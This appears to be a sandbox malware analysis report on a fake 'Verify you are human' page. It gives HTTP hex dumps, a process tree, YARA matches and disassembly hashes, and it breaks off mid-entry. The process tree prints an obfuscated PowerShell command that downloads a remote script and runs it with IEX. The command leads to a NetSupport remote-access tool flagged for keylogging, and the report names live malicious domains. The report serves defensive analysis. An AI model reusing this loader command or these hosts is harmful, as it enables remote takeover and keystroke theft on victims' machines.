                                                                                                                                                              2024-10-28 18:46:04 UTC15824INData Raw: 4d 53 43 46 00 00 00 00 8d 2b 00 00 00 00 00 00 44 00 00 00 00 00 00 00 03 01 01 00 01 00 04 00 5b 49 00 00 14 00 00 00 00 00 10 00 8d 2b 00 00 a8 49 00 00 00 00 00 00 00 00 00 00 64 00 00 00 01 00 01 00 72 4d 00 00 00 00 00 00 00 00 00 00 00 00 80 00 65 6e 76 69 72 6f 6e 6d 65 6e 74 2e 63 61 62 00 fe f6 51 be 21 2b 72 4d 43 4b ed 7c 05 58 54 eb da f6 14 43 49 37 0a 02 d2 b9 86 0e 41 52 a4 1b 24 a5 bb 43 24 44 18 94 90 92 52 41 3a 05 09 95 ee 54 b0 00 91 2e e9 12 10 04 11 c9 6f 10 b7 a2 67 9f bd cf 3e ff b7 ff b3 bf 73 ed e1 9a 99 f5 c6 7a d7 bb de f5 3e cf fd 3c f7 dc 17 4a 1a 52 e7 41 a8 97 1e 14 f4 e5 25 7d f4 05 82 82 c1 20 30 08 06 ba c3 05 02 11 7f a9 c1 ff d2 87 5c 1e f4 ed 65 8e 7a 1f f6 0a 40 03 1d 7b f9 83 2c 1c 2f db b8 3a 39 3a 58 38 ba 73 5e
                                                                                                                                                              Data Ascii: MSCF+D[I+IdrMenvironment.cabQ!+rMCK|XTCI7AR$C$DRA:T.og>sz><JRA%} 0\ez@{,/:9:X8s^
                                                                                                                                                              2024-10-28 18:46:04 UTC14181INData Raw: 06 03 55 04 06 13 02 55 53 31 13 30 11 06 03 55 04 08 13 0a 57 61 73 68 69 6e 67 74 6f 6e 31 10 30 0e 06 03 55 04 07 13 07 52 65 64 6d 6f 6e 64 31 1e 30 1c 06 03 55 04 0a 13 15 4d 69 63 72 6f 73 6f 66 74 20 43 6f 72 70 6f 72 61 74 69 6f 6e 31 26 30 24 06 03 55 04 03 13 1d 4d 69 63 72 6f 73 6f 66 74 20 54 69 6d 65 2d 53 74 61 6d 70 20 50 43 41 20 32 30 31 30 30 1e 17 0d 32 33 31 30 31 32 31 39 30 37 32 35 5a 17 0d 32 35 30 31 31 30 31 39 30 37 32 35 5a 30 81 d2 31 0b 30 09 06 03 55 04 06 13 02 55 53 31 13 30 11 06 03 55 04 08 13 0a 57 61 73 68 69 6e 67 74 6f 6e 31 10 30 0e 06 03 55 04 07 13 07 52 65 64 6d 6f 6e 64 31 1e 30 1c 06 03 55 04 0a 13 15 4d 69 63 72 6f 73 6f 66 74 20 43 6f 72 70 6f 72 61 74 69 6f 6e 31 2d 30 2b 06 03 55 04 0b 13 24 4d 69 63 72 6f
                                                                                                                                                              Data Ascii: UUS10UWashington10URedmond10UMicrosoft Corporation1&0$UMicrosoft Time-Stamp PCA 20100231012190725Z250110190725Z010UUS10UWashington10URedmond10UMicrosoft Corporation1-0+U$Micro


                                                                                                                                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                              10192.168.2.1649724166.1.160.754437848C:\Windows\System32\mshta.exe
                                                                                                                                                              TimestampBytes transferredDirectionData
                                                                                                                                                              2024-10-28 18:46:12 UTC340OUTGET /Ray-verify.html HTTP/1.1
                                                                                                                                                              Accept: */*
                                                                                                                                                              Accept-Language: en-CH
                                                                                                                                                              UA-CPU: AMD64
                                                                                                                                                              Accept-Encoding: gzip, deflate
                                                                                                                                                              User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 10.0; Win64; x64; Trident/7.0; .NET4.0C; .NET4.0E; .NET CLR 2.0.50727; .NET CLR 3.0.30729; .NET CLR 3.5.30729)
                                                                                                                                                              Host: inspyrehomedesign.com
                                                                                                                                                              Connection: Keep-Alive
                                                                                                                                                              2024-10-28 18:46:12 UTC279INHTTP/1.1 200 OK
                                                                                                                                                              Server: nginx/1.26.2
                                                                                                                                                              Date: Mon, 28 Oct 2024 18:46:12 GMT
                                                                                                                                                              Content-Type: text/html; charset=UTF-8
                                                                                                                                                              Content-Length: 10478
                                                                                                                                                              Connection: close
                                                                                                                                                              Last-Modified: Mon, 21 Oct 2024 07:55:44 GMT
                                                                                                                                                              ETag: "28ee-624f7fad44000"
                                                                                                                                                              Accept-Ranges: bytes
                                                                                                                                                              Vary: Accept-Encoding
                                                                                                                                                              2024-10-28 18:46:12 UTC10478INData Raw: 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 27 78 2d 75 61 2d 63 6f 6d 70 61 74 69 62 6c 65 27 20 63 6f 6e 74 65 6e 74 3d 27 45 6d 75 6c 61 74 65 49 45 39 27 3e 3c 4d 45 54 41 20 4e 41 4d 45 3d 27 47 45 4e 45 52 41 54 4f 52 27 20 43 6f 6e 74 65 6e 74 3d 27 54 68 65 20 73 6f 75 72 63 65 20 63 6f 64 65 20 6f 66 20 74 68 69 73 20 70 61 67 65 20 69 73 20 65 6e 63 72 79 70 74 65 64 20 77 69 74 68 20 48 54 4d 4c 20 47 75 61 72 64 69 61 6e 2c 20 20 74 68 65 20 77 6f 72 6c 64 27 73 20 73 74 61 6e 64 61 72 74 20 66 6f 72 20 77 65 62 73 69 74 65 20 70 72 6f 74 65 63 74 69 6f 6e 2e 20 56 69 73 69 74 20 68 74 74 70 3a 2f 2f 77 77 77 2e 70 72 6f 74 77 61 72 65 2e 63 6f 6d 20 66 6f 72 20 64 65 74 61 69 6c 73 27 3e 3c 6d 65 74
                                                                                                                                                              Data Ascii: <html><head><meta http-equiv='x-ua-compatible' content='EmulateIE9'><META NAME='GENERATOR' Content='The source code of this page is encrypted with HTML Guardian, the world's standart for website protection. Visit http://www.protware.com for details'><met


                                                                                                                                                              Statistics

                                                                                                                                                              CPU Usage

                                                                                                                                                              Click to jump to process

                                                                                                                                                              Memory Usage

                                                                                                                                                              Click to jump to process

                                                                                                                                                              High Level Behavior Distribution

                                                                                                                                                              Click to dive into process behavior distribution

                                                                                                                                                              Behavior

                                                                                                                                                              Click to jump to process

                                                                                                                                                              System Behavior

                                                                                                                                                              General

                                                                                                                                                              Target ID:0
                                                                                                                                                              Start time:14:45:11
                                                                                                                                                              Start date:28/10/2024
                                                                                                                                                              Path:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                              Wow64 process (32bit):false
                                                                                                                                                              Commandline:"C:\Program Files\Google\Chrome\Application\chrome.exe" --start-maximized "about:blank"
                                                                                                                                                              Imagebase:0x7ff7f9810000
                                                                                                                                                              File size:3'242'272 bytes
                                                                                                                                                              MD5 hash:45DE480806D1B5D462A7DDE4DCEFC4E4
                                                                                                                                                              Has elevated privileges:true
                                                                                                                                                              Has administrator privileges:true
                                                                                                                                                              Programmed in:C, C++ or other language
                                                                                                                                                              Reputation:low
                                                                                                                                                              Has exited:false

                                                                                                                                                              General

                                                                                                                                                              Target ID:1
                                                                                                                                                              Start time:14:45:12
                                                                                                                                                              Start date:28/10/2024
                                                                                                                                                              Path:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                              Wow64 process (32bit):false
                                                                                                                                                              Commandline:"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=2164 --field-trial-handle=1896,i,2740781035066481159,16273883810358689985,262144 --disable-features=OptimizationGuideModelDownloading,OptimizationHints,OptimizationHintsFetching,OptimizationTargetPrediction /prefetch:8
                                                                                                                                                              Imagebase:0x7ff7f9810000
                                                                                                                                                              File size:3'242'272 bytes
                                                                                                                                                              MD5 hash:45DE480806D1B5D462A7DDE4DCEFC4E4
                                                                                                                                                              Has elevated privileges:true
                                                                                                                                                              Has administrator privileges:true
                                                                                                                                                              Programmed in:C, C++ or other language
                                                                                                                                                              Reputation:low
                                                                                                                                                              Has exited:false

                                                                                                                                                              General

                                                                                                                                                              Target ID:2
                                                                                                                                                              Start time:14:45:13
                                                                                                                                                              Start date:28/10/2024
                                                                                                                                                              Path:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                              Wow64 process (32bit):false
                                                                                                                                                              Commandline:"C:\Program Files\Google\Chrome\Application\chrome.exe" "https://inspyrehomedesign.com/Ray-verify.html"
                                                                                                                                                              Imagebase:0x7ff7f9810000
                                                                                                                                                              File size:3'242'272 bytes
                                                                                                                                                              MD5 hash:45DE480806D1B5D462A7DDE4DCEFC4E4
                                                                                                                                                              Has elevated privileges:true
                                                                                                                                                              Has administrator privileges:true
                                                                                                                                                              Programmed in:C, C++ or other language
                                                                                                                                                              Reputation:low
                                                                                                                                                              Has exited:true

                                                                                                                                                              General

                                                                                                                                                              Target ID:11
                                                                                                                                                              Start time:14:46:10
                                                                                                                                                              Start date:28/10/2024
                                                                                                                                                              Path:C:\Windows\System32\mshta.exe
                                                                                                                                                              Wow64 process (32bit):false
                                                                                                                                                              Commandline:"C:\Windows\system32\mshta.exe" https://inspyrehomedesign.com/Ray-verify.html # ? ''Verify you are human - Ray Verification ID: 3293''
                                                                                                                                                              Imagebase:0x7ff60c100000
                                                                                                                                                              File size:14'848 bytes
                                                                                                                                                              MD5 hash:0B4340ED812DC82CE636C00FA5C9BEF2
                                                                                                                                                              Has elevated privileges:false
                                                                                                                                                              Has administrator privileges:false
                                                                                                                                                              Programmed in:C, C++ or other language
                                                                                                                                                              Reputation:low
                                                                                                                                                              Has exited:true

                                                                                                                                                              General

                                                                                                                                                              Target ID:12
                                                                                                                                                              Start time:14:46:11
                                                                                                                                                              Start date:28/10/2024
                                                                                                                                                              Path:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                              Wow64 process (32bit):false
                                                                                                                                                              Commandline:"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" $c1='(New-Object Net.We'; $c4='bClient).Downlo'; $c3='adString(''http://traversecityspringbreak.com/o/o.png'')';$TC=I`E`X ($c1,$c4,$c3 -Join '')|I`E`X
                                                                                                                                                              Imagebase:0x7ff7582a0000
                                                                                                                                                              File size:452'608 bytes
                                                                                                                                                              MD5 hash:04029E121A0CFA5991749937DD22A1D9
                                                                                                                                                              Has elevated privileges:false
                                                                                                                                                              Has administrator privileges:false
                                                                                                                                                              Programmed in:C, C++ or other language
                                                                                                                                                              Reputation:low
                                                                                                                                                              Has exited:true

                                                                                                                                                              General

                                                                                                                                                              Target ID:13
                                                                                                                                                              Start time:14:46:11
                                                                                                                                                              Start date:28/10/2024
                                                                                                                                                              Path:C:\Windows\System32\conhost.exe
                                                                                                                                                              Wow64 process (32bit):false
                                                                                                                                                              Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                                                                                              Imagebase:0x7ff6684c0000
                                                                                                                                                              File size:862'208 bytes
                                                                                                                                                              MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                                                                                                                              Has elevated privileges:false
                                                                                                                                                              Has administrator privileges:false
                                                                                                                                                              Programmed in:C, C++ or other language
                                                                                                                                                              Reputation:low
                                                                                                                                                              Has exited:true

                                                                                                                                                              General

                                                                                                                                                              Target ID:14
                                                                                                                                                              Start time:14:46:15
                                                                                                                                                              Start date:28/10/2024
                                                                                                                                                              Path:C:\Windows\System32\ipconfig.exe
                                                                                                                                                              Wow64 process (32bit):false
                                                                                                                                                              Commandline:"C:\Windows\system32\ipconfig.exe" /flushdns
                                                                                                                                                              Imagebase:0x7ff79a970000
                                                                                                                                                              File size:35'840 bytes
                                                                                                                                                              MD5 hash:62F170FB07FDBB79CEB7147101406EB8
                                                                                                                                                              Has elevated privileges:false
                                                                                                                                                              Has administrator privileges:false
                                                                                                                                                              Programmed in:C, C++ or other language
                                                                                                                                                              Reputation:low
                                                                                                                                                              Has exited:true

                                                                                                                                                              General

                                                                                                                                                              Target ID:15
                                                                                                                                                              Start time:14:46:16
                                                                                                                                                              Start date:28/10/2024
                                                                                                                                                              Path:C:\Windows\System32\cmd.exe
                                                                                                                                                              Wow64 process (32bit):false
                                                                                                                                                              Commandline:"C:\Windows\system32\cmd.exe" /c attrib +h C:\Users\user\AppData\Roaming\bpsFyf
                                                                                                                                                              Imagebase:0x7ff6fd780000
                                                                                                                                                              File size:289'792 bytes
                                                                                                                                                              MD5 hash:8A2122E8162DBEF04694B9C3E0B6CDEE
                                                                                                                                                              Has elevated privileges:false
                                                                                                                                                              Has administrator privileges:false
                                                                                                                                                              Programmed in:C, C++ or other language
                                                                                                                                                              Reputation:low
                                                                                                                                                              Has exited:true

                                                                                                                                                              General

                                                                                                                                                              Target ID:16
                                                                                                                                                              Start time:14:46:16
                                                                                                                                                              Start date:28/10/2024
                                                                                                                                                              Path:C:\Windows\System32\attrib.exe
                                                                                                                                                              Wow64 process (32bit):false
                                                                                                                                                              Commandline:attrib +h C:\Users\user\AppData\Roaming\bpsFyf
                                                                                                                                                              Imagebase:0x7ff7fdf20000
                                                                                                                                                              File size:23'040 bytes
                                                                                                                                                              MD5 hash:5037D8E6670EF1D89FB6AD435F12A9FD
                                                                                                                                                              Has elevated privileges:false
                                                                                                                                                              Has administrator privileges:false
                                                                                                                                                              Programmed in:C, C++ or other language
                                                                                                                                                              Reputation:low
                                                                                                                                                              Has exited:true

                                                                                                                                                              General

                                                                                                                                                              Target ID:20
                                                                                                                                                              Start time:14:46:27
                                                                                                                                                              Start date:28/10/2024
                                                                                                                                                              Path:C:\Windows\System32\rundll32.exe
                                                                                                                                                              Wow64 process (32bit):false
                                                                                                                                                              Commandline:C:\Windows\System32\rundll32.exe C:\Windows\System32\shell32.dll,SHCreateLocalServerRunDll {9aa46009-3ce0-458a-a354-715610a075e6} -Embedding
                                                                                                                                                              Imagebase:0x7ff61d1e0000
                                                                                                                                                              File size:71'680 bytes
                                                                                                                                                              MD5 hash:EF3179D498793BF4234F708D3BE28633
                                                                                                                                                              Has elevated privileges:false
                                                                                                                                                              Has administrator privileges:false
                                                                                                                                                              Programmed in:C, C++ or other language
                                                                                                                                                              Reputation:low
                                                                                                                                                              Has exited:true

                                                                                                                                                              General

                                                                                                                                                              Target ID:21
                                                                                                                                                              Start time:14:46:34
                                                                                                                                                              Start date:28/10/2024
                                                                                                                                                              Path:C:\Users\user\AppData\Roaming\bpsFyf\client32.exe
                                                                                                                                                              Wow64 process (32bit):true
                                                                                                                                                              Commandline:"C:\Users\user\AppData\Roaming\bpsFyf\client32.exe"
                                                                                                                                                              Imagebase:0xd10000
                                                                                                                                                              File size:120'288 bytes
                                                                                                                                                              MD5 hash:EE75B57B9300AAB96530503BFAE8A2F2
                                                                                                                                                              Has elevated privileges:false
                                                                                                                                                              Has administrator privileges:false
                                                                                                                                                              Programmed in:C, C++ or other language
                                                                                                                                                              Yara matches:
                                                                                                                                                              • Rule: JoeSecurity_NetSupport, Description: Yara detected NetSupport remote tool, Source: 00000015.00000002.2427569432.000000006C640000.00000002.00000001.01000000.00000013.sdmp, Author: Joe Security
                                                                                                                                                              • Rule: JoeSecurity_NetSupport, Description: Yara detected NetSupport remote tool, Source: 00000015.00000002.2405808800.0000000000D12000.00000002.00000001.01000000.0000000E.sdmp, Author: Joe Security
                                                                                                                                                              • Rule: JoeSecurity_NetSupport, Description: Yara detected NetSupport remote tool, Source: 00000015.00000000.1975726137.0000000000D12000.00000002.00000001.01000000.0000000E.sdmp, Author: Joe Security
                                                                                                                                                              • Rule: JoeSecurity_Keylogger_Generic, Description: Yara detected Keylogger Generic, Source: 00000015.00000002.2422619093.0000000011193000.00000002.00000001.01000000.0000000F.sdmp, Author: Joe Security
                                                                                                                                                              • Rule: JoeSecurity_NetSupport, Description: Yara detected NetSupport remote tool, Source: 00000015.00000002.2422619093.0000000011193000.00000002.00000001.01000000.0000000F.sdmp, Author: Joe Security
                                                                                                                                                              • Rule: JoeSecurity_NetSupport, Description: Yara detected NetSupport remote tool, Source: 00000015.00000002.2423288156.00000000111E1000.00000004.00000001.01000000.0000000F.sdmp, Author: Joe Security
                                                                                                                                                              • Rule: JoeSecurity_NetSupport, Description: Yara detected NetSupport remote tool, Source: 00000015.00000000.1975726137.0000000000D1F000.00000002.00000001.01000000.0000000E.sdmp, Author: Joe Security
                                                                                                                                                              • Rule: JoeSecurity_NetSupport, Description: Yara detected NetSupport remote tool, Source: C:\Users\user\AppData\Roaming\bpsFyf\client32.exe, Author: Joe Security
                                                                                                                                                              Antivirus matches:
                                                                                                                                                              • Detection: 13%, ReversingLabs
                                                                                                                                                              Reputation:low
                                                                                                                                                              Has exited:false

                                                                                                                                                              Disassembly

                                                                                                                                                              Reset < >

                                                                                                                                                                Executed Functions

                                                                                                                                                                Function 0000025C9848621E Relevance: .2, Instructions: 171COMMON
                                                                                                                                                                Download Yara Rule
                                                                                                                                                                Memory Dump Source
                                                                                                                                                                • Source File: 0000000B.00000003.1753176795.0000025C98486000.00000010.00000800.00020000.00000000.sdmp, Offset: 0000025C98486000, based on PE: false
                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                • Snapshot File: hcaresult_11_3_25c98486000_mshta.jbxd
                                                                                                                                                                Similarity
                                                                                                                                                                • API ID:
                                                                                                                                                                • String ID:
                                                                                                                                                                • API String ID:
                                                                                                                                                                • Opcode ID: 470f8003a2280efb8a85aaf11524de6dd5d9ed2339bdb3fb46ecfecfb8a350fe
                                                                                                                                                                • Instruction ID: b64934c4bdc6a461ae54f48410479c8b1748399c0bc269c68b9f6d8d85d27d3a
                                                                                                                                                                • Opcode Fuzzy Hash: 470f8003a2280efb8a85aaf11524de6dd5d9ed2339bdb3fb46ecfecfb8a350fe
                                                                                                                                                                • Instruction Fuzzy Hash: 9751F15011EBC51FC7A6977C58AA6F67FE0DF1B210B1808CED0C9CF9A3D018985AC35A
                                                                                                                                                                Function 0000025C98486414 Relevance: .1, Instructions: 63COMMON
                                                                                                                                                                Download Yara Rule
                                                                                                                                                                Memory Dump Source
                                                                                                                                                                • Source File: 0000000B.00000003.1753176795.0000025C98486000.00000010.00000800.00020000.00000000.sdmp, Offset: 0000025C98486000, based on PE: false
                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                • Snapshot File: hcaresult_11_3_25c98486000_mshta.jbxd
                                                                                                                                                                Similarity
                                                                                                                                                                • API ID:
                                                                                                                                                                • String ID:
                                                                                                                                                                • API String ID:
                                                                                                                                                                • Opcode ID: 7581baa57a302103d4aa8c3cf9027a97514bb7b839cbc7e4b19859b555f7bbac
                                                                                                                                                                • Instruction ID: 97a3812351a2b0c2571ed4c6c034697fff15af32a4e642c11de61a9c62066b47
                                                                                                                                                                • Opcode Fuzzy Hash: 7581baa57a302103d4aa8c3cf9027a97514bb7b839cbc7e4b19859b555f7bbac
                                                                                                                                                                • Instruction Fuzzy Hash: 0911E1A121DB880FDB98E63C9469A757BD0DF69314F4404DEE085CB2A2E424EC82C38A
                                                                                                                                                                Function 0000025C98481F4D Relevance: .0, Instructions: 23COMMON
                                                                                                                                                                Download Yara Rule
                                                                                                                                                                Memory Dump Source
                                                                                                                                                                • Source File: 0000000B.00000003.1753261441.0000025C98481000.00000010.00000800.00020000.00000000.sdmp, Offset: 0000025C98481000, based on PE: false
                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                • Snapshot File: hcaresult_11_3_25c98481000_mshta.jbxd
                                                                                                                                                                Similarity
                                                                                                                                                                • API ID:
                                                                                                                                                                • String ID:
                                                                                                                                                                • API String ID:
                                                                                                                                                                • Opcode ID: 9f1cbebfe36d22b0706020cafc36a86d290b3a2ea38b71e1cec28c3ffda9a938
                                                                                                                                                                • Instruction ID: 752b44dfaf469ce9382a1c5f46fdced184170793645e259864460362c5f99246
                                                                                                                                                                • Opcode Fuzzy Hash: 9f1cbebfe36d22b0706020cafc36a86d290b3a2ea38b71e1cec28c3ffda9a938
                                                                                                                                                                • Instruction Fuzzy Hash: F8E04F5151DFC80FEB5A5374187D1747EE1DF56250B9408CFD89ACB4A3DC2408818316
                                                                                                                                                                Function 0000025C98484B82 Relevance: .0, Instructions: 7COMMON
                                                                                                                                                                Download Yara Rule
                                                                                                                                                                Memory Dump Source
                                                                                                                                                                • Source File: 0000000B.00000003.1753224248.0000025C98484000.00000010.00000800.00020000.00000000.sdmp, Offset: 0000025C98484000, based on PE: false
                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                • Snapshot File: hcaresult_11_3_25c98484000_mshta.jbxd
                                                                                                                                                                Similarity
                                                                                                                                                                • API ID:
                                                                                                                                                                • String ID:
                                                                                                                                                                • API String ID:
                                                                                                                                                                • Opcode ID: f3a31a653940f2cd1f2bac128e10a96e544339aff0aba06e2f8f8b97b4691e81
                                                                                                                                                                • Instruction ID: c7c2afde1b6d3ef774ef234a620332e7dedf8bbd4c895b1d765bc1ec3eab262a
                                                                                                                                                                • Opcode Fuzzy Hash: f3a31a653940f2cd1f2bac128e10a96e544339aff0aba06e2f8f8b97b4691e81
                                                                                                                                                                • Instruction Fuzzy Hash: BDB0125280CF804EF32519700D1C12425818B553F173509C35805E7062ED204D4001A1
                                                                                                                                                                Function 0000025C98390F79 Relevance: .0, Instructions: 5COMMON
                                                                                                                                                                Download Yara Rule
                                                                                                                                                                Memory Dump Source
                                                                                                                                                                • Source File: 0000000B.00000003.1753299678.0000025C98390000.00000010.00000800.00020000.00000000.sdmp, Offset: 0000025C98390000, based on PE: false
                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                • Snapshot File: hcaresult_11_3_25c98390000_mshta.jbxd
                                                                                                                                                                Similarity
                                                                                                                                                                • API ID:
                                                                                                                                                                • String ID:
                                                                                                                                                                • API String ID:
                                                                                                                                                                • Opcode ID: 408bef09d469c2f46428e607b0c970413b7c389e1ff92e89cd5a5ac698755f7d
                                                                                                                                                                • Instruction ID: 6b96d785f7bafc17d4179e51ec5979a3b04b44e9525dc4191be920b3615cac48
                                                                                                                                                                • Opcode Fuzzy Hash: 408bef09d469c2f46428e607b0c970413b7c389e1ff92e89cd5a5ac698755f7d
                                                                                                                                                                • Instruction Fuzzy Hash: C2900206499906E9D41411910C5926C50407388261FE454904427D1144E55E03965156
                                                                                                                                                                Function 0000025C98390F11 Relevance: .0, Instructions: 5COMMON
                                                                                                                                                                Download Yara Rule
                                                                                                                                                                Memory Dump Source
                                                                                                                                                                • Source File: 0000000B.00000003.1753299678.0000025C98390000.00000010.00000800.00020000.00000000.sdmp, Offset: 0000025C98390000, based on PE: false
                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                • Snapshot File: hcaresult_11_3_25c98390000_mshta.jbxd
                                                                                                                                                                Similarity
                                                                                                                                                                • API ID:
                                                                                                                                                                • String ID:
                                                                                                                                                                • API String ID:
                                                                                                                                                                • Opcode ID: 408bef09d469c2f46428e607b0c970413b7c389e1ff92e89cd5a5ac698755f7d
                                                                                                                                                                • Instruction ID: 6b96d785f7bafc17d4179e51ec5979a3b04b44e9525dc4191be920b3615cac48
                                                                                                                                                                • Opcode Fuzzy Hash: 408bef09d469c2f46428e607b0c970413b7c389e1ff92e89cd5a5ac698755f7d
                                                                                                                                                                • Instruction Fuzzy Hash: C2900206499906E9D41411910C5926C50407388261FE454904427D1144E55E03965156
                                                                                                                                                                Function 0000025C98390F51 Relevance: .0, Instructions: 5COMMON
                                                                                                                                                                Download Yara Rule
                                                                                                                                                                Memory Dump Source
                                                                                                                                                                • Source File: 0000000B.00000003.1753299678.0000025C98390000.00000010.00000800.00020000.00000000.sdmp, Offset: 0000025C98390000, based on PE: false
                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                • Snapshot File: hcaresult_11_3_25c98390000_mshta.jbxd
                                                                                                                                                                Similarity
                                                                                                                                                                • API ID:
                                                                                                                                                                • String ID:
                                                                                                                                                                • API String ID:
                                                                                                                                                                • Opcode ID: 408bef09d469c2f46428e607b0c970413b7c389e1ff92e89cd5a5ac698755f7d
                                                                                                                                                                • Instruction ID: 6b96d785f7bafc17d4179e51ec5979a3b04b44e9525dc4191be920b3615cac48
                                                                                                                                                                • Opcode Fuzzy Hash: 408bef09d469c2f46428e607b0c970413b7c389e1ff92e89cd5a5ac698755f7d
                                                                                                                                                                • Instruction Fuzzy Hash: C2900206499906E9D41411910C5926C50407388261FE454904427D1144E55E03965156
                                                                                                                                                                Function 0000025C98390F91 Relevance: .0, Instructions: 5COMMON
                                                                                                                                                                Download Yara Rule
                                                                                                                                                                Memory Dump Source
                                                                                                                                                                • Source File: 0000000B.00000003.1753299678.0000025C98390000.00000010.00000800.00020000.00000000.sdmp, Offset: 0000025C98390000, based on PE: false
                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                • Snapshot File: hcaresult_11_3_25c98390000_mshta.jbxd
                                                                                                                                                                Similarity
                                                                                                                                                                • API ID:
                                                                                                                                                                • String ID:
                                                                                                                                                                • API String ID:
                                                                                                                                                                • Opcode ID: 408bef09d469c2f46428e607b0c970413b7c389e1ff92e89cd5a5ac698755f7d
                                                                                                                                                                • Instruction ID: 6b96d785f7bafc17d4179e51ec5979a3b04b44e9525dc4191be920b3615cac48
                                                                                                                                                                • Opcode Fuzzy Hash: 408bef09d469c2f46428e607b0c970413b7c389e1ff92e89cd5a5ac698755f7d
                                                                                                                                                                • Instruction Fuzzy Hash: C2900206499906E9D41411910C5926C50407388261FE454904427D1144E55E03965156
                                                                                                                                                                Function 0000025C98390F71 Relevance: .0, Instructions: 5COMMON
                                                                                                                                                                Download Yara Rule
                                                                                                                                                                Memory Dump Source
                                                                                                                                                                • Source File: 0000000B.00000003.1753299678.0000025C98390000.00000010.00000800.00020000.00000000.sdmp, Offset: 0000025C98390000, based on PE: false
                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                • Snapshot File: hcaresult_11_3_25c98390000_mshta.jbxd
                                                                                                                                                                Similarity
                                                                                                                                                                • API ID:
                                                                                                                                                                • String ID:
                                                                                                                                                                • API String ID:
                                                                                                                                                                • Opcode ID: 408bef09d469c2f46428e607b0c970413b7c389e1ff92e89cd5a5ac698755f7d
                                                                                                                                                                • Instruction ID: 6b96d785f7bafc17d4179e51ec5979a3b04b44e9525dc4191be920b3615cac48
                                                                                                                                                                • Opcode Fuzzy Hash: 408bef09d469c2f46428e607b0c970413b7c389e1ff92e89cd5a5ac698755f7d
                                                                                                                                                                • Instruction Fuzzy Hash: C2900206499906E9D41411910C5926C50407388261FE454904427D1144E55E03965156
                                                                                                                                                                Function 0000025C98390F31 Relevance: .0, Instructions: 5COMMON
                                                                                                                                                                Download Yara Rule
                                                                                                                                                                Memory Dump Source
                                                                                                                                                                • Source File: 0000000B.00000003.1753299678.0000025C98390000.00000010.00000800.00020000.00000000.sdmp, Offset: 0000025C98390000, based on PE: false
                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                • Snapshot File: hcaresult_11_3_25c98390000_mshta.jbxd
                                                                                                                                                                Similarity
                                                                                                                                                                • API ID:
                                                                                                                                                                • String ID:
                                                                                                                                                                • API String ID:
                                                                                                                                                                • Opcode ID: 408bef09d469c2f46428e607b0c970413b7c389e1ff92e89cd5a5ac698755f7d
                                                                                                                                                                • Instruction ID: 6b96d785f7bafc17d4179e51ec5979a3b04b44e9525dc4191be920b3615cac48
                                                                                                                                                                • Opcode Fuzzy Hash: 408bef09d469c2f46428e607b0c970413b7c389e1ff92e89cd5a5ac698755f7d
                                                                                                                                                                • Instruction Fuzzy Hash: C2900206499906E9D41411910C5926C50407388261FE454904427D1144E55E03965156
                                                                                                                                                                Function 0000025C98390F49 Relevance: .0, Instructions: 5COMMON
                                                                                                                                                                Download Yara Rule
                                                                                                                                                                Memory Dump Source
                                                                                                                                                                • Source File: 0000000B.00000003.1753299678.0000025C98390000.00000010.00000800.00020000.00000000.sdmp, Offset: 0000025C98390000, based on PE: false
                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                • Snapshot File: hcaresult_11_3_25c98390000_mshta.jbxd
                                                                                                                                                                Similarity
                                                                                                                                                                • API ID:
                                                                                                                                                                • String ID:
                                                                                                                                                                • API String ID:
                                                                                                                                                                • Opcode ID: 408bef09d469c2f46428e607b0c970413b7c389e1ff92e89cd5a5ac698755f7d
                                                                                                                                                                • Instruction ID: 6b96d785f7bafc17d4179e51ec5979a3b04b44e9525dc4191be920b3615cac48
                                                                                                                                                                • Opcode Fuzzy Hash: 408bef09d469c2f46428e607b0c970413b7c389e1ff92e89cd5a5ac698755f7d
                                                                                                                                                                • Instruction Fuzzy Hash: C2900206499906E9D41411910C5926C50407388261FE454904427D1144E55E03965156
                                                                                                                                                                Function 0000025C98390F89 Relevance: .0, Instructions: 5COMMON
                                                                                                                                                                Download Yara Rule
                                                                                                                                                                Memory Dump Source
                                                                                                                                                                • Source File: 0000000B.00000003.1753299678.0000025C98390000.00000010.00000800.00020000.00000000.sdmp, Offset: 0000025C98390000, based on PE: false
                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                • Snapshot File: hcaresult_11_3_25c98390000_mshta.jbxd
                                                                                                                                                                Similarity
                                                                                                                                                                • API ID:
                                                                                                                                                                • String ID:
                                                                                                                                                                • API String ID:
                                                                                                                                                                • Opcode ID: 408bef09d469c2f46428e607b0c970413b7c389e1ff92e89cd5a5ac698755f7d
                                                                                                                                                                • Instruction ID: 6b96d785f7bafc17d4179e51ec5979a3b04b44e9525dc4191be920b3615cac48
                                                                                                                                                                • Opcode Fuzzy Hash: 408bef09d469c2f46428e607b0c970413b7c389e1ff92e89cd5a5ac698755f7d
                                                                                                                                                                • Instruction Fuzzy Hash: C2900206499906E9D41411910C5926C50407388261FE454904427D1144E55E03965156
                                                                                                                                                                Function 0000025C98390F69 Relevance: .0, Instructions: 5COMMON
                                                                                                                                                                Download Yara Rule
                                                                                                                                                                Memory Dump Source
